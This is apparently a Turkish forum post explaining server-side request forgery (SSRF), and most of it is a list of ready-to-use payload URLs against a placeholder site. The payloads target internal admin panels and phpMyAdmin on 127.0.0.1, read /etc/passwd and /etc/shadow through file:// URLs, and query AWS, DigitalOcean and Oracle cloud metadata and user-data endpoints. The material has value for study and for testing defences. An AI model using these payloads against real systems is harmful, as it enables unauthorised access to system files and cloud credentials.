- 17 Nis 2021
- 72
- 27
SSRF Hack Nedir?
Sunucu tarafı istek sahteciliği (veya SSRF) güvenlik açıkları, sistemden tamamen ödün verilmesine yol açabilir ve kötüye kullanılması durumunda bir kuruluşun dahili veya bulut altyapısına erişime izin verebilir.
SSRF Saldırıları Ne Tür Bilgiler İçerir?
1)Bir SSRF saldırısı, sunucu dosyaları-bulut sağlayıcı (meta) verileri ve açık bağlantı noktalarına yetkisiz erişim sağlayabilir.
Sunucudaki açık portları kullanarak XSPA saldırısı yapabilir.
Kısaca XSPA Saldırısı: Saldırgan, güvenlik açığı bulunan bir web uygulamasına, dış İnternet'e bakan sunuculara, intranet cihazlarına ve web sunucusunun kendisine yapılan proxy saldırıları için hazırlanmış sorgular gönderebilir.
2)Bulut sunucudaki verilere saldırı yaparak bu verilere erişebilir.
SSRF Sunucu Saldırıları
Dahili sayfalara yani admin panel bilgilerine ulaşarak bypass denenir.
https://ornek.com/page?url=http://127.0.0.1/admin
https://ornek.com/page?url=http://127.0.0.1/phpmyadmin
Dahili bir sunucudan veri almak amacıyla saldırgan, dosya erişimi için (/etc) kullanır.
https://ornek.com/page?url=file://etc/passwd
https://ornek.com/page?url=file:///etc/passwd
https://ornek.com/page?url=file:///etc/shadow
Bulut Sağlayıcı Meta Verilere Ulaşmak
Gereksinim: Oracle
Oracle için proxy: 192.0.0.192
https://ornek.com/page?url=http://192.0.0.192/latest/user-data
htps://ornek.com/page?url=http://192.0.0.192/latest
Gereksinim: AWS
AWS için proxy: 169.254.169.254
https://ornek.com/page?url=http://169.254.169.254/latest/meta-data
https://ornek.com/page?url=http://169.254.169.254/latest/user-data
Gereksinim: Digital Ocean
D.O için proxy: 169.254.169.254
https://ornek.com/page?url=http://169.254.169.254/metadata/v1/id
https://ornek.com/page?url=http://169.254.169.254/metadata/v1/hostname
Son düzenleme: